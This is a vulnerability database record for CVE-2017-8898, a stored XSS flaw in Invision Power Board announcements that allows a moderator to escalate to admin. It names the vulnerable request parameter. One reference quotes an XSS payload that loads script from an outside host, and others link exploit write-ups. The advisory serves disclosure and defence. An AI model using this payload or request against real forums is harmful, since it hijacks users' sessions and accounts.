CVE-2017-8898
Summary
| CVE | CVE-2017-8898 |
|---|---|
| State | PUBLIC |
| Assigner | [email protected] |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2017-05-11 17:29:00 UTC |
| Updated | 2020-06-03 14:55:00 UTC |
| Description | Invision Power Services (IPS) Community Suite 4.1.19.2 and earlier has stored XSS in the Announcements, allowing privilege escalation from an Invision Power Board moderator to an admin. An attack uses the announce_content parameter in an index.php?/modcp/announcements/&action=create request. This is related to the "<> Source" option. |
Risk And Classification
Problem Types: CWE-79
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Application | Invisioncommunity | Invision Power Board | All | All | All | All |
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| Corben Leo na Twitterze: "Payload could be something like this: <script src=//sxcurity.pro/pocs/p.js></script>… " | MISC | twitter.com | Exploit, Third Party Advisory |
| zeroday.insecurity.zone/exploits/ipb_owned.txt | MISC | zeroday.insecurity.zone | Exploit, Third Party Advisory |
| PROJECT INSECURITY na Twitterze: "[EXPLOIT] IPB Forum (4x: Current) - Reflected/Stored XSS + CSRF + FPD + Malicious file upload + ACP->Shell writeup: https://t.co/5XEw98fIVk… https://t.co/RqpG6zDfzW" | MISC | twitter.com | Exploit, Third Party Advisory |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
No vendor comments have been submitted for this CVE.
There are currently no legacy QID mappings associated with this CVE.